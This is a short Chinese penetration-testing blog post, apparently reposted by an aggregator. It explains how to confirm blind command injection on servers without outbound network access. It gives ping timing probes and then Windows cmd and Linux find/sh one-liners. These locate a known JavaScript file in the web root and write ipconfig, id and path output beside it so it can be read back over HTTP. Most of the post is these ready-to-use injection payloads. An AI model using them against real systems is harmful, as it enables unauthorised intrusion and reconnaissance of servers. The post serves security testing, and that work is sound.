无回显不出网命令执行测试方式

Posted cwkiller

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了无回显不出网命令执行测试方式相关的知识,希望对你有一定的参考价值。

前言

本文主要讲的是无回显、不出网命令执行测试方法,首先通过大小写判断是linux还是win,然后通过命令自动查找目录写文件来测试。

这里没有这种环境就拿一个php的做演示(其实像这种可以直接写马在当前目录)
首先我们通过下面命令和响应包的时间判断存在命令执行(适用于win linux下使用-c)

ping -n 3 127.0.0.1
ping -n 4 127.0.0.1

技术图片

技术图片

然后在网站上找一个名字比较少见特殊的js(如果网站有上传图片的地方可以用你上传图片的名字)

技术图片

windows下的测试方式

执行下面命令自动查找bsa.js并在其目录写入文件(由于可能不知道是什么盘可能需要多次尝试)

cmd /c "for /f %i in (‘dir /s /b e:bsa.js‘) do (echo %i> %i.path.txt)%26(ipconfig > %i.ipconfig.txt)"

技术图片

http://www.test.com/js/ 目录下访问 bsa.js.ipconfig.txt bsa.js.path.txt查看执行ifconfig的结果和路径

技术图片

linux下的测试方式

使用下面的命令,自动查找bas.js并在其目录下生成test.txt写入id pwd ifconfig命令的结果

find / -name bas.js|while read f;do sh -c ‘id;pwd;ifconfig‘ >$(dirname $f)/test.txt;done

技术图片

参考链接:https://mp.weixin.qq.com/s/9cXGR7tlN_OAP-dMyZyHEw

以上是关于无回显不出网命令执行测试方式的主要内容,如果未能解决你的问题,请参考以下文章

不可错过!命令执行无回显的一些姿势

不可错过!命令执行无回显的一些姿势

命令执行小记2

内网------不出网批量上线

记一次PHP渗透测试实战教程

Fedora Xfce 23 thunar显不出文件缩略图却不知为那般?